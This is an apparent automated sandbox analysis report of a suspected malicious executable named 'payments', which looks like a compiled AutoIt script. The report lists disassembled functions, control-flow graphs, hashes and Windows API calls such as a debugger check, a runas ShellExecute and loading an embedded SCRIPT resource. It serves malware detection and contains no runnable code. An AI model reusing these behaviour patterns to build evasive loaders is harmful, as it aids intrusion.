                                                                                                                          control_flow_graph 644 cbb043-cbb080 call cbf8a0 647 cbb089-cbb08b 644->647 648 cbb082-cbb084 644->648 650 cbb08d-cbb0a7 call cb7bda call cb7c0e call cb6e10 647->650 651 cbb0ac-cbb0d9 647->651 649 cbb860-cbb86c call cba70c 648->649 650->649 652 cbb0db-cbb0de 651->652 653 cbb0e0-cbb0e7 651->653 652->653 656 cbb10b-cbb110 652->656 657 cbb0e9-cbb100 call cb7bda call cb7c0e call cb6e10 653->657 658 cbb105 653->658 662 cbb11f-cbb12d call cc3bf2 656->662 663 cbb112-cbb11c call cbf82f 656->663 693 cbb851-cbb854 657->693 658->656 674 cbb44b-cbb45d 662->674 675 cbb133-cbb145 662->675 663->662 678 cbb7b8-cbb7d5 WriteFile 674->678 679 cbb463-cbb473 674->679 675->674 677 cbb14b-cbb183 call cb7a0d GetConsoleMode 675->677 677->674 697 cbb189-cbb18f 677->697 685 cbb7e1-cbb7e7 GetLastError 678->685 686 cbb7d7-cbb7df 678->686 682 cbb55a-cbb55f 679->682 683 cbb479-cbb484 679->683 688 cbb663-cbb66e 682->688 689 cbb565-cbb56e 682->689 691 cbb81b-cbb833 683->691 692 cbb48a-cbb49a 683->692 687 cbb7e9 685->687 686->687 694 cbb7ef-cbb7f1 687->694 688->691 701 cbb674 688->701 689->691 695 cbb574 689->695 699 cbb83e-cbb84e call cb7c0e call cb7bda 691->699 700 cbb835-cbb838 691->700 698 cbb4a0-cbb4a3 692->698 696 cbb85e-cbb85f 693->696 704 cbb7f3-cbb7f5 694->704 705 cbb856-cbb85c 694->705 706 cbb57e-cbb595 695->706 696->649 707 cbb199-cbb1bc GetConsoleCP 697->707 708 cbb191-cbb193 697->708 709 cbb4e9-cbb520 WriteFile 698->709 710 cbb4a5-cbb4be 698->710 699->693 700->699 711 cbb83a-cbb83c 700->711 702 cbb67e-cbb693 701->702 712 cbb699-cbb69b 702->712 704->691 714 cbb7f7-cbb7fc 704->714 705->696 715 cbb59b-cbb59e 706->715 716 cbb1c2-cbb1ca 707->716 717 cbb440-cbb446 707->717 708->674 708->707 709->685 720 cbb526-cbb538 709->720 718 cbb4cb-cbb4e7 710->718 719 cbb4c0-cbb4ca 710->719 711->696 722 cbb6d8-cbb719 WideCharToMultiByte 712->722 723 cbb69d-cbb6b3 712->723 725 cbb7fe-cbb810 call cb7c0e call cb7bda 714->725 726 cbb812-cbb819 call cb7bed 714->726 727 cbb5de-cbb627 WriteFile 715->727 728 cbb5a0-cbb5b6 715->728 729 cbb1d4-cbb1d6 716->729 717->704 718->698 718->709 719->718 720->694 721 cbb53e-cbb54f 720->721 721->692 730 cbb555 721->730 722->685 734 cbb71f-cbb721 722->734 731 cbb6c7-cbb6d6 723->731 732 cbb6b5-cbb6c4 723->732 725->693 726->693 727->685 739 cbb62d-cbb645 727->739 736 cbb5b8-cbb5ca 728->736 737 cbb5cd-cbb5dc 728->737 740 cbb36b-cbb36e 729->740 741 cbb1dc-cbb1fe 729->741 730->694 731->712 731->722 732->731 744 cbb727-cbb75a WriteFile 734->744 736->737 737->715 737->727 739->694 747 cbb64b-cbb658 739->747 742 cbb370-cbb373 740->742 743 cbb375-cbb3a2 740->743 748 cbb200-cbb215 741->748 749 cbb217-cbb223 call cb1688 741->749 742->743 751 cbb3a8-cbb3ab 742->751 743->751 752 cbb77a-cbb78e GetLastError 744->752 753 cbb75c-cbb776 744->753 747->706 755 cbb65e 747->755 756 cbb271-cbb283 call cc40f7 748->756 764 cbb269-cbb26b 749->764 765 cbb225-cbb239 749->765 758 cbb3ad-cbb3b0 751->758 759 cbb3b2-cbb3c5 call cc5884 751->759 763 cbb794-cbb796 752->763 753->744 760 cbb778 753->760 755->694 774 cbb289 756->774 775 cbb435-cbb43b 756->775 758->759 766 cbb407-cbb40a 758->766 759->685 778 cbb3cb-cbb3d5 759->778 760->763 763->687 769 cbb798-cbb7b0 763->769 764->756 771 cbb23f-cbb254 call cc40f7 765->771 772 cbb412-cbb42d 765->772 766->729 770 cbb410 766->770 769->702 776 cbb7b6 769->776 770->775 771->775 784 cbb25a-cbb267 771->784 772->775 779 cbb28f-cbb2c4 WideCharToMultiByte 774->779 775->687 776->694 781 cbb3fb-cbb401 778->781 782 cbb3d7-cbb3ee call cc5884 778->782 779->775 783 cbb2ca-cbb2f0 WriteFile 779->783 781->766 782->685 790 cbb3f4-cbb3f5 782->790 783->685 786 cbb2f6-cbb30e 783->786 784->779 786->775 788 cbb314-cbb31b 786->788 788->781 789 cbb321-cbb34c WriteFile 788->789 789->685 791 cbb352-cbb359 789->791 790->781 791->775 792 cbb35f-cbb366 791->792 792->781
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 7dbd2c33a069467e017bd4dd66a375ea98f0549e501aaced77a9418bf70693fb
                                                                                                                          • Instruction ID: 02936df5ee99692e4727017f093366c05bdbe7654a4e05ce2c1332bcf5e1051e
                                                                                                                          • Opcode Fuzzy Hash: 7dbd2c33a069467e017bd4dd66a375ea98f0549e501aaced77a9418bf70693fb
                                                                                                                          • Instruction Fuzzy Hash: 37325C75B022288FDB248F15DC81AE9B7B5FF4A310F1841D9E81AE7A91D7709E81CF52
                                                                                                                          Function 00C93D19 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 151windowCOMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00C93AA3,?), ref: 00C93D45
                                                                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,00C93AA3,?), ref: 00C93D57
                                                                                                                          • GetFullPathNameW.KERNEL32(00007FFF,?,?,,00D51130,?,?,?,?,00C93AA3,?), ref: 00C93DC8
                                                                                                                            • Part of subcall function 00C96430: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00C93DEE,,?,?,?,?,?,00C93AA3,?), ref: 00C96471
                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,00C93AA3,?), ref: 00C93E48
                                                                                                                          • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00D428F4,00000010), ref: 00D01CCE
                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?,,?,?,?,?,?,00C93AA3,?), ref: 00D01D06
                                                                                                                          • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00D2DAB4,,?,?,?,?,?,00C93AA3,?), ref: 00D01D89
                                                                                                                          • ShellExecuteW.SHELL32(00000000,?,?,?,?,00C93AA3), ref: 00D01D90
                                                                                                                            • Part of subcall function 00C93E6E: GetSysColorBrush.USER32(0000000F), ref: 00C93E79
                                                                                                                            • Part of subcall function 00C93E6E: LoadCursorW.USER32(00000000,00007F00), ref: 00C93E88
                                                                                                                            • Part of subcall function 00C93E6E: LoadIconW.USER32(00000063), ref: 00C93E9E
                                                                                                                            • Part of subcall function 00C93E6E: LoadIconW.USER32(000000A4), ref: 00C93EB0
                                                                                                                            • Part of subcall function 00C93E6E: LoadIconW.USER32(000000A2), ref: 00C93EC2
                                                                                                                            • Part of subcall function 00C93E6E: RegisterClassExW.USER32(?), ref: 00C93F30
                                                                                                                            • Part of subcall function 00C936B8: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00C936E6
                                                                                                                            • Part of subcall function 00C936B8: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00C93707
                                                                                                                            • Part of subcall function 00C936B8: ShowWindow.USER32(00000000,?,?,?,?,00C93AA3,?), ref: 00C9371B
                                                                                                                            • Part of subcall function 00C936B8: ShowWindow.USER32(00000000,?,?,?,?,00C93AA3,?), ref: 00C93724
                                                                                                                            • Part of subcall function 00C94FFC: _memset.LIBCMT ref: 00C95022
                                                                                                                            • Part of subcall function 00C94FFC: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00C950CB
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$IconLoad$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                                                                                                                          • String ID: This is a third-party compiled AutoIt script.$runas$
                                                                                                                          • API String ID: 438480954-2314413276
                                                                                                                          • Opcode ID: 7cf4a1b65675e7b1efe62a96237dd90059f74e1e903ff43585746dc48f091c4f
                                                                                                                          • Instruction ID: 25604137253aac22eebb52c826ab066ca0b3eb59244ca553bf009b9750c4a27e
                                                                                                                          • Opcode Fuzzy Hash: 7cf4a1b65675e7b1efe62a96237dd90059f74e1e903ff43585746dc48f091c4f
                                                                                                                          • Instruction Fuzzy Hash: 48511535A04788BECF02ABF4DC49FEE7B769B15741F0040A4F912A22D2DB744A0ADB31
                                                                                                                          Function 00CADDC0 Relevance: 10.7, APIs: 7, Instructions: 175COMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 1138 caddc0-cade4f call c9d7f7 GetVersionExW call c96a63 call cadfb4 call c96571 1147 d024c8-d024cb 1138->1147 1148 cade55-cade56 1138->1148 1149 d024e4-d024e8 1147->1149 1150 d024cd 1147->1150 1151 cade58-cade63 1148->1151 1152 cade92-cadea2 call cadf77 1148->1152 1155 d024d3-d024dc 1149->1155 1156 d024ea-d024f3 1149->1156 1154 d024d0 1150->1154 1157 cade69-cade6b 1151->1157 1158 d0244e-d02454 1151->1158 1167 cadec7-cadee1 1152->1167 1168 cadea4-cadec1 GetCurrentProcess call cadf5f 1152->1168 1154->1155 1155->1149 1156->1154 1164 d024f5-d024f8 1156->1164 1159 d02469-d02475 1157->1159 1160 cade71-cade74 1157->1160 1162 d02456-d02459 1158->1162 1163 d0245e-d02464 1158->1163 1169 d02477-d0247a 1159->1169 1170 d0247f-d02485 1159->1170 1165 cade7a-cade89 1160->1165 1166 d02495-d02498 1160->1166 1162->1152 1163->1152 1164->1155 1171 cade8f 1165->1171 1172 d0248a-d02490 1165->1172 1166->1152 1173 d0249e-d024b3 1166->1173 1175 cadee3-cadef7 call cae00c 1167->1175 1176 cadf31-cadf3b GetSystemInfo 1167->1176 1168->1167 1190 cadec3 1168->1190 1169->1152 1170->1152 1171->1152 1172->1152 1177 d024b5-d024b8 1173->1177 1178 d024bd-d024c3 1173->1178 1185 cadf29-cadf2f GetSystemInfo 1175->1185 1186 cadef9-cadf01 call cadff4 GetNativeSystemInfo 1175->1186 1180 cadf0e-cadf1a 1176->1180 1177->1152 1178->1152 1182 cadf1c-cadf1f FreeLibrary 1180->1182 1183 cadf21-cadf26 1180->1183 1182->1183 1189 cadf03-cadf07 1185->1189 1186->1189 1189->1180 1192 cadf09-cadf0c FreeLibrary 1189->1192 1190->1167 1192->1180
                                                                                                                          APIs
                                                                                                                          • GetVersionExW.KERNEL32(?), ref: 00CADDEC
                                                                                                                          • GetCurrentProcess.KERNEL32(00000000,00D2DC38,?,?), ref: 00CADEAC
                                                                                                                          • GetNativeSystemInfo.KERNELBASE(?,00D2DC38,?,?), ref: 00CADF01
                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?), ref: 00CADF0C
                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?), ref: 00CADF1F
                                                                                                                          • GetSystemInfo.KERNEL32(?,00D2DC38,?,?), ref: 00CADF29
                                                                                                                          • GetSystemInfo.KERNEL32(?,00D2DC38,?,?), ref: 00CADF35
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3851250370-0
                                                                                                                          • Opcode ID: 597ab79bddffcb3e948f93d9357df31ec8daae01da868c4de178dfabf386dc61
                                                                                                                          • Instruction ID: 1cf932803b0443f5c7a2c584ffda8b1b3608ce33af06f2a869064e7eaf7e31f4
                                                                                                                          • Opcode Fuzzy Hash: 597ab79bddffcb3e948f93d9357df31ec8daae01da868c4de178dfabf386dc61
                                                                                                                          • Instruction Fuzzy Hash: 6A61D57180A385DFCF15CFA898C41EABFB46F3A304B1985D9D84A9F247C634CA49CB65
                                                                                                                          Function 00C9406B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 1210 c9406b-c94083 CreateStreamOnHGlobal 1211 c940a3-c940a6 1210->1211 1212 c94085-c9409c FindResourceExW 1210->1212 1213 d04f16-d04f25 LoadResource 1212->1213 1214 c940a2 1212->1214 1213->1214 1215 d04f2b-d04f39 SizeofResource 1213->1215 1214->1211 1215->1214 1216 d04f3f-d04f4a LockResource 1215->1216 1216->1214 1217 d04f50-d04f6e 1216->1217 1217->1214
                                                                                                                          APIs
                                                                                                                          • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00C9449E,?,?,00000000,00000001), ref: 00C9407B
                                                                                                                          • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00C9449E,?,?,00000000,00000001), ref: 00C94092
                                                                                                                          • LoadResource.KERNEL32(?,00000000,?,?,00C9449E,?,?,00000000,00000001,?,?,?,?,?,?,00C941FB), ref: 00D04F1A
                                                                                                                          • SizeofResource.KERNEL32(?,00000000,?,?,00C9449E,?,?,00000000,00000001,?,?,?,?,?,?,00C941FB), ref: 00D04F2F
                                                                                                                          • LockResource.KERNEL32(00C9449E,?,?,00C9449E,?,?,00000000,00000001,?,?,?,?,?,?,00C941FB,00000000), ref: 00D04F42
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                          • String ID: SCRIPT
                                                                                                                          • API String ID: 3051347437-3967369404
                                                                                                                          • Opcode ID: 45c2da25344d33cbf25fe9c3157953a9530f273bca33c9c4eaf0a94eb68c6b0a
                                                                                                                          • Instruction ID: 37be629dc8f5e0aa42a81ebefc63534681b057ffa269ca06335ba7315e97282e
                                                                                                                          • Opcode Fuzzy Hash: 45c2da25344d33cbf25fe9c3157953a9530f273bca33c9c4eaf0a94eb68c6b0a
                                                                                                                          • Instruction Fuzzy Hash: 51111871200701BFEB258B65ED4CF677BBAEBC5B51F14816DB616D62A0DB71DC028A30
                                                                                                                          Function 00C93A0F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • IsThemeActive.UXTHEME ref: 00C93A73
                                                                                                                            • Part of subcall function 00CB1405: __lock.LIBCMT ref: 00CB140B
                                                                                                                            • Part of subcall function 00C93ADB: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00C93AF3
                                                                                                                            • Part of subcall function 00C93ADB: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00C93B08
                                                                                                                            • Part of subcall function 00C93D19: GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00C93AA3,?), ref: 00C93D45
                                                                                                                            • Part of subcall function 00C93D19: IsDebuggerPresent.KERNEL32(?,?,?,?,00C93AA3,?), ref: 00C93D57
                                                                                                                            • Part of subcall function 00C93D19: GetFullPathNameW.KERNEL32(00007FFF,?,?,,00D51130,?,?,?,?,00C93AA3,?), ref: 00C93DC8
                                                                                                                            • Part of subcall function 00C93D19: SetCurrentDirectoryW.KERNEL32(?,?,?,00C93AA3,?), ref: 00C93E48
                                                                                                                          • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00C93AB3
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme__lock
                                                                                                                          • String ID: `>
                                                                                                                          • API String ID: 924797094-1004004633
                                                                                                                          • Opcode ID: e83e0fd4dfa6b7bce650d6a16e0a9c4b8aa6b2f5080aaac5dd947cc7d048acf5
                                                                                                                          • Instruction ID: 6df99b51a7fff312ed1a5ba7720b76d39a93d455ee6be5d08acca74882e142f8
                                                                                                                          • Opcode Fuzzy Hash: e83e0fd4dfa6b7bce650d6a16e0a9c4b8aa6b2f5080aaac5dd947cc7d048acf5
                                                                                                                          • Instruction Fuzzy Hash: 9D11CD71904341AFC300EF69EC49A1EBBE9EB95320F00891EF885C73A1DB708545DBA2
                                                                                                                          Function 00CD6CA9 Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetFileAttributesW.KERNELBASE(?,00D02F49), ref: 00CD6CB9
                                                                                                                          • FindFirstFileW.KERNELBASE(?,?), ref: 00CD6CCA
                                                                                                                          • FindClose.KERNEL32(00000000), ref: 00CD6CDA
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FileFind$AttributesCloseFirst
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 48322524-0
                                                                                                                          • Opcode ID: 86a9cae540d7d50d28f08950faf9c74ccc9435fc5cb6ae834707e175070c24ea
                                                                                                                          • Instruction ID: 1777fd518298e9b9dca0ff4095c3266861276134df8bcb080b262809d99dce0a
                                                                                                                          • Opcode Fuzzy Hash: 86a9cae540d7d50d28f08950faf9c74ccc9435fc5cb6ae834707e175070c24ea
                                                                                                                          • Instruction Fuzzy Hash: 68E048318246157B82106738EC0D4E9776DDB45339F204716F575C13D0EB70DA4585E5
                                                                                                                          Function 00CA3B70 Relevance: 2.2, Strings: 1, Instructions: 903COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Exception@8Throwstd::exception::exception
                                                                                                                          • String ID: @
                                                                                                                          • API String ID: 3728558374-2766056989
                                                                                                                          • Opcode ID: 47f32c3fce424959f4a0f9d15bdfbc5fbd977e7b162c647e5632af56e7784e26
                                                                                                                          • Instruction ID: 90d21318dcffe1c851416e51f90f242b2d910391cc9440fde159fec33ec9c6ad
                                                                                                                          • Opcode Fuzzy Hash: 47f32c3fce424959f4a0f9d15bdfbc5fbd977e7b162c647e5632af56e7784e26
                                                                                                                          • Instruction Fuzzy Hash: 6272D130E04246DFCF14DF94C891BAEB7B5EF4A308F14805AF919AB291D770AE45DBA1
                                                                                                                          Function 00CA3200 Relevance: 1.0, Instructions: 986COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: BuffCharUpper
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3964851224-0
                                                                                                                          • Opcode ID: ed4082813249e4a22a8019506fbf066015ccbb4978a1df4bfb75cfe96db6d7d5
                                                                                                                          • Instruction ID: ced47d6a8362c4a7a31ae020297baf70ea5a05929db2b54a060751b87d84147f
                                                                                                                          • Opcode Fuzzy Hash: ed4082813249e4a22a8019506fbf066015ccbb4978a1df4bfb75cfe96db6d7d5
                                                                                                                          • Instruction Fuzzy Hash: 10928A706083428FD714DF18C4A4B6AB7E1BF89308F14885DF99A8B3A2D771ED45DB62
                                                                                                                          Function 00C9E8D0 Relevance: 49.8, APIs: 24, Strings: 4, Instructions: 816windowsleeptimeCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C9E959
                                                                                                                          • timeGetTime.WINMM ref: 00C9EBFA
                                                                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C9ED2E
                                                                                                                          • TranslateMessage.USER32(?), ref: 00C9ED3F
                                                                                                                          • DispatchMessageW.USER32(?), ref: 00C9ED4A
                                                                                                                          • LockWindowUpdate.USER32(00000000), ref: 00C9ED79
                                                                                                                          • DestroyWindow.USER32 ref: 00C9ED85
                                                                                                                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00C9ED9F
                                                                                                                          • Sleep.KERNEL32(0000000A), ref: 00D05270
                                                                                                                          • TranslateMessage.USER32(?), ref: 00D059F7
                                                                                                                          • DispatchMessageW.USER32(?), ref: 00D05A05
                                                                                                                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00D05A19
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                                                                                                                          • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                                                                                          • API String ID: 2641332412-570651680
                                                                                                                          • Opcode ID: 7e7cf2fa6ec102c560e00c7727e360f49ef6e9bcc4f1e01a5adf9b1fb2ba6848
                                                                                                                          • Instruction ID: a7449c8c95153e506dc7b1a54947367bb31b44c653f9ba46495c6358238536c6
                                                                                                                          • Opcode Fuzzy Hash: 7e7cf2fa6ec102c560e00c7727e360f49ef6e9bcc4f1e01a5adf9b1fb2ba6848
                                                                                                                          • Instruction Fuzzy Hash: 9162CE70508340DFEB24DF24D889BAA77E4BF54304F08496DF98A8B2D6DB71D948DB62
                                                                                                                          Function 00CC5C78 Relevance: 47.9, APIs: 26, Strings: 1, Instructions: 626fileCOMMONLIBRARYCODE
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • ___createFile.LIBCMT ref: 00CC5EC3
                                                                                                                          • ___createFile.LIBCMT ref: 00CC5F04
                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00CC5F2D
